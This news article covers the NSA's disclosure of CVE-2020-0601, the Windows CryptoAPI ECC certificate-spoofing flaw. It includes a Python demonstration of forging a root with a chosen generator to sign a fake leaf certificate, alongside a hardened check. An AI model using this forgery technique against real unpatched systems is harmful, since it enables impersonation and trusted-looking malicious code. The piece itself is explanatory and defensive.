NSA Shares Vulnerability Discovered In Microsoft Windows 10 And Server Platforms

Exploit Bypasses Trust Validation Process; Patch Released


Jeff Orr

NSA Discovers Vulnerability

The U.S. National Security Agency (NSA) took the unusual step of publicly disclosing a vulnerability it discovered in Microsoft Windows 10 and Windows Server 2016/2019. Microsoft released a patch for it the same day, as part of its January 14, 2020 Patch Tuesday updates.

The vulnerability, tracked as CVE-2020-0601, lies in the certificate validation code of the Windows CryptoAPI (Crypt32.dll). NSA rates it severe; Microsoft's own severity rating for the advisory is Important.

According to the NSA brief, the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution. The vulnerability affects Windows 10 and Windows Server 2016/2019 as well as applications that rely on Windows for trust functionality.

Exploitation of the vulnerability allows an attacker to defeat trusted network connections and deliver executable code while appearing to be a legitimately trusted entity. The flaw is in how CryptoAPI validates Elliptic Curve Cryptography (ECC) certificates: a certificate may describe its curve with explicit parameters rather than a named curve, and Windows matched such a certificate against its trusted roots by public key alone, without checking that the curve parameters agreed. An attacker who chooses a generator point so that a trusted root's public key corresponds to a private key the attacker holds can therefore forge certificates that appear to chain to that root. Examples of trust validation that may be affected include HTTPS connections, signed files and emails, and signed executable code launched as user-mode processes.

Code signing is the stamp of approval within the Windows trust model, and this vulnerability throws that stamp into doubt. Fortunately, Microsoft's patch corrects the validation so that the curve parameters are checked as well as the public key; once it is installed, a system that rejects such a certificate logs an Application event (source Audit-CVE, Event ID 1), which defenders can collect to spot exploitation attempts.
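The trust bypass described above, as an added worked example that is not code from the article, the NSA advisory or Microsoft. It uses NIST P-256 in pure Python (the real-world proofs of concept targeted P-384 roots; the trick does not depend on the curve), a constructed root CA key, a constructed attacker key of 2, and a toy trust store. The "vulnerable" matcher reproduces the bug class (matching a root by public key only); the "hardened" one also compares the full curve parameters.

```python
"""CVE-2020-0601 mechanics on P-256: an attacker who picks the generator can
hold a private key for a trusted root's public key. Added example, not code
from the article, NSA or Microsoft; all keys and names below are constructed."""
import hashlib
import secrets

# NIST P-256 domain parameters (standard constants).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
NAMED_P256 = {"p": P, "a": A, "b": B, "n": N, "g": G}


def ec_add(p1, p2):
    """Affine point addition on y^2 = x^3 + Ax + B over GF(P); None is infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def ec_mul(k, point):
    """Double-and-add scalar multiplication (not constant time; illustration only)."""
    result = None
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def ecdsa_sign(msg, priv, params):
    """Textbook ECDSA over SHA-256 using the generator in `params`."""
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    while True:
        k = secrets.randbelow(params["n"] - 1) + 1
        r = ec_mul(k, params["g"])[0] % params["n"]
        s = pow(k, -1, params["n"]) * (z + r * priv) % params["n"]
        if r and s:
            return r, s


def ecdsa_verify(msg, sig, pub, params):
    r, s = sig
    n = params["n"]
    if not (0 < r < n and 0 < s < n):
        return False
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    w = pow(s, -1, n)
    pt = ec_add(ec_mul(z * w % n, params["g"]), ec_mul(r * w % n, pub))
    return pt is not None and pt[0] % n == r


# Constructed trusted root: the CA's private key never leaves the CA.
CA_PRIV = 0x6b8e9c1d2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c
CA_PUB = ec_mul(CA_PRIV, G)
TRUST_STORE = [{"name": "Example ECC Root", "pub": CA_PUB, "params": NAMED_P256}]


def forge_root(ca_pub, attacker_priv):
    """Choose G' = d'^-1 * Q so that d' * G' = Q: the forged root carries the
    trusted root's public key, but with explicit parameters the attacker picked."""
    g_prime = ec_mul(pow(attacker_priv, -1, N), ca_pub)
    explicit = dict(NAMED_P256, g=g_prime)  # same field and curve, new generator
    return {"pub": ca_pub, "params": explicit}


def vulnerable_match(issuer, store):
    """Bug class behind CVE-2020-0601: trust decided on the public key alone."""
    return any(issuer["pub"] == root["pub"] for root in store)


def hardened_match(issuer, store):
    """Fixed behaviour: the curve parameters must match the trusted root too."""
    return any(issuer["pub"] == root["pub"] and issuer["params"] == root["params"]
               for root in store)


def demo(attacker_priv=2):
    fake_root = forge_root(CA_PUB, attacker_priv)
    leaf = b"CN=bank.example (constructed leaf certificate body)"
    sig = ecdsa_sign(leaf, attacker_priv, fake_root["params"])
    return {
        "attacker_key_matches_root": ec_mul(attacker_priv, fake_root["params"]["g"]) == CA_PUB,
        "sig_verifies_under_fake_params": ecdsa_verify(leaf, sig, fake_root["pub"], fake_root["params"]),
        "sig_verifies_under_real_params": ecdsa_verify(leaf, sig, CA_PUB, NAMED_P256),
        "vulnerable_trusts_forged_root": vulnerable_match(fake_root, TRUST_STORE),
        "hardened_trusts_forged_root": hardened_match(fake_root, TRUST_STORE),
    }
```

Running `demo()` shows the whole story in one dictionary: the attacker's key really does correspond to the root's public key under the forged parameters, a leaf signed with that key verifies when the verifier takes the generator from the forged certificate, the same signature fails under the genuine P-256 parameters, and only the matcher that compares parameters refuses the forged root.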


Windows: The De Facto Standard For Enterprise OS

There is no doubt that Windows is the dominant enterprise OS, so the number of organizations affected by this vulnerability is significant. In September 2019, Microsoft Corporate Vice President of Modern Life & Devices Yusuf Mehdi revealed its installed base. “#Windows10 is on more than 900M devices! Thanks to our customers, we added more new Windows 10 devices in the last 12 months than ever before,” Mehdi tweeted.

In Fall 2018, Microsoft officials said that more than half of all Windows enterprise devices were running Windows 10, with the other half running some older version, primarily Windows 7. With Windows 7 reaching end of support on January 14, 2020, the same day this patch shipped, organizations have been migrating to Windows 10 in earnest. Windows 7 itself is not affected by CVE-2020-0601; the vulnerable validation code was introduced in Windows 10.


A New Chapter For NSA Handling Of Cyber Vulnerabilities

On a call with media, Anne Neuberger, head of the NSA's Cybersecurity Directorate, said, “[We are] recommending that network owners expedite implementation of the patch immediately as we will also be doing. When we identified a broad cryptographic vulnerability like this we quickly turned to work with the company to ensure that they could mitigate it.”

In 2017, a Windows SMBv1 vulnerability known to the NSA was not disclosed up front, and the agency reportedly exploited it for as many as five years. The exploit developed for it, known as EternalBlue, was leaked by the Shadow Brokers group and was quickly adopted by criminals and nation-states to attack unpatched Windows systems, most visibly in the WannaCry and NotPetya outbreaks.

The NSA has faced further criticism over the years for its practice of hoarding vulnerabilities for its own use. Most security researchers report findings to vendors and developers so the issues can be fixed. The timely disclosure of this vulnerability is part of the agency's effort to share what it finds without first exploiting the weakness for intelligence purposes.
